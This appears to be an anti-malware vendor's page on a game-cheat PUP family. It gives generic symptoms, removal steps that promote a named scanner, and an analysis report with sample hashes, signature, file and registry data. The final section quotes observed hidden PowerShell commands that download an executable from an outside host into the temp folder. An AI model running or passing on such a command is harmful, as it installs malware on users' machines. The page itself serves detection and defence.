PUP.Gamehack.GSO
The detection of PUP.Gamehack.GSO on your system indicates the presence of a potentially unwanted program (PUP) that may be causing issues with your computer's performance and security. It is essential to understand the nature of this threat and take immediate action to remove it and prevent further damage.
Table of Contents
What Is PUP.Gamehack.GSO?
PUP.Gamehack.GSO is a type of malware that is classified as a potentially unwanted program. This category of threats includes software that may not be malicious in the classical sense but can still cause problems for users. PUPs often sneak onto systems through bundled downloads, misleading advertisements, or exploits in software. They can lead to a range of issues, from annoying pop-ups and slowed system performance to more serious security vulnerabilities.
How PUP.Gamehack.GSO Operates
Once installed, PUP.Gamehack.GSO may operate in various ways to achieve its goals, which could include displaying unwanted advertisements, collecting user data without consent, or even downloading additional malicious software. These programs often have the ability to modify system settings, which can lead to changes in browser behavior, such as altering the default search engine or homepage. They might also consume system resources, leading to decreased performance and increased risk of system crashes.
Symptoms of Infection
Symptoms of a PUP.Gamehack.GSO infection can vary but commonly include an increase in unwanted pop-ups or advertisements, unexpected changes to browser settings, slowed computer performance, and the presence of unfamiliar programs or toolbars. Users might also notice that their web searches are being redirected to unwanted sites or that their personal data is being collected without their knowledge or consent. Recognizing these symptoms early is crucial for minimizing the impact of the infection.
How to Remove PUP.Gamehack.GSO
- Enter Safe Mode with Networking: This will help prevent the malware from interfering with the removal process. Safe Mode starts Windows in a basic state, using a limited set of files and drivers, which can make it easier to remove the malware.
- Perform a Full Scan with a Reputable Tool: Utilize a trusted anti-malware tool, such as SpyHunter, to scan your system thoroughly. These tools are designed to detect and remove PUPs and other types of malware, ensuring your system is clean and secure.
- Uninstall Suspicious Programs: Go through the list of installed programs on your computer and uninstall any that you do not recognize or that were installed without your consent. Be cautious and ensure you are not removing essential system software.
- Reset Your Browser Settings: For browsers like Chrome, Firefox, and Edge, resetting the browser settings to their default values can help remove changes made by the PUP. This includes removing unwanted extensions, resetting the homepage, and clearing browsing data.
- Reboot and Re-scan: After taking these steps, reboot your computer and perform another scan with your anti-malware tool to ensure that all traces of the PUP have been removed. This step is crucial for confirming the effectiveness of the removal process.
Conclusion
Removing PUP.Gamehack.GSO requires a combination of technical knowledge and the right tools. By following the steps outlined above, you can effectively remove this potentially unwanted program from your system and restore your computer's performance and security. It's also important to take preventive measures, such as being cautious with downloads, keeping your software up to date, and regularly scanning your system for malware, to avoid future infections. Remember, staying vigilant and proactive is key to maintaining a secure and healthy computing environment.
Analysis Report
General information
| Family Name: | PUP.Gamehack.GSO |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
a7668609025ed001fad36544c0d4a50a
SHA1:
29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256:
75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size:
749.06 KB, 749056 bytes
|
|
MD5:
611362bc4aa194c52db4c95555d2b2b8
SHA1:
bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256:
5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size:
9.64 MB, 9637552 bytes
|
|
MD5:
391b4d88bed80c0af1a4b2a82a7fd75f
SHA1:
de029ce807430a4c2cd5ed087be9208b80d34e6e
SHA256:
3C040644F07FC00668D94B72AEAC0978496B9D168C6136E75EE3FF6950E4F84D
File Size:
8.50 MB, 8497664 bytes
|
|
MD5:
f2d1bb13f3a555ba438bc6a1d85f2ac6
SHA1:
c29a5e0e0991bc178c214da4ca55417389f2877f
SHA256:
C682E74B5228290F5D4E6BFD2FF29B200D601133109FED64271E3866AA4F6C9A
File Size:
5.92 MB, 5924352 bytes
|
|
MD5:
ef5dc7d52dc642308fa95d5439019d21
SHA1:
db232052b7e3069f4b8160773d50a846aab6bc1d
SHA256:
EA507D5BF7CA0C1FA23D5A3DCF3DF27829F86B78F23FC842B14013003DCB4CFA
File Size:
8.41 MB, 8411648 bytes
|
Show More
|
MD5:
bc50729adf40b5e5fb01c26f0299e339
SHA1:
56bf737c4289fe9e94fb1552931ec85f8cf783b9
SHA256:
E796647EEAE43F6D7A1E78C7F4DA58DF2BC02C7A2446E3B54CD957544FBB09CE
File Size:
9.41 MB, 9413120 bytes
|
|
MD5:
0d69b26b85f6f7cee71116495121963a
SHA1:
02249ab5941379fdb45425a7dd59ba367bf11715
SHA256:
CA7C824C4E2148BAAA448DB5CEF85663131D5FF527C0183CB4EBF4E5BB3BD348
File Size:
563.20 KB, 563200 bytes
|
|
MD5:
e758803d00481cfe45fecd37cb6a0ae7
SHA1:
1d8527c2aaf1fdcf721288a43d29691b86060342
SHA256:
A4EFF77F7828B5324260E833DB2BF11161A1B0497DF48C07B292A8716464B3C8
File Size:
2.34 MB, 2337280 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have exports table
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 64-bit executable
- File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
Show More
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.Windows PE Version Information
Windows PE Version Information
This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.| Name | Value |
|---|---|
| Company Name | Minkio Software |
| File Description | Game Overlay Renderer |
| File Version | 1.4.2.0 |
| Internal Name | MinkioOverlay |
| Legal Copyright | Copyright (C) 2025 Minkio Software |
| Original Filename | MinkioExternal.exe |
| Product Name | Minkio Overlay |
| Product Version | 1.4.2 |
Digital Signatures
Digital Signatures
This section lists digital signatures that are attached to samples within this family. When analyzing and verifying digital signatures, it is important to confirm that the signature’s root authority is a well-known and trustworthy entity and that the status of the signature is good. Malware is often signed with non-trustworthy “Self Signed” digital signatures (which can be easily created by a malware author with no verification). Malware may also be signed by legitimate signatures that have an invalid status, and by signatures from questionable root authorities with fake or misleading “Signer” names.| Signer | Root | Status |
|---|---|---|
| Areeb Ahmed Code Signing LLC | Areeb Ahmed Code Signing LLC | Self Signed |
| Microsoft Corporation | Microsoft Code Signing PCA 2011 | Hash Mismatch |
| Microsoft Windows Software Compatibility Publisher | Microsoft Windows Third Party Component CA 2013 | Hash Mismatch |
File Traits
- dll
- HighEntropy
- imgui
- No Version Info
- ntdll
- WriteProcessMemory
- x64
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 5,307 |
|---|---|
| Potentially Malicious Blocks: | 435 |
| Whitelisted Blocks: | 4,502 |
| Unknown Blocks: | 370 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- Gamehack.GSR
- RobloxHack.LE
- RobloxStealer.B
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| \device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1 | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Data | API Name |
|---|---|---|
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | ��]\|�� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 梀屧ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㣙岽ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 鬓岿ǜ | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Syscall Use |
Show More
26 additional items are not displayed above. |
| Process Manipulation Evasion |
|
| Anti Debug |
|
| User Data Access |
|
| Process Shell Execute |
|
| Process Terminate |
|
| Encryption Used |
|
| Other Suspicious |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|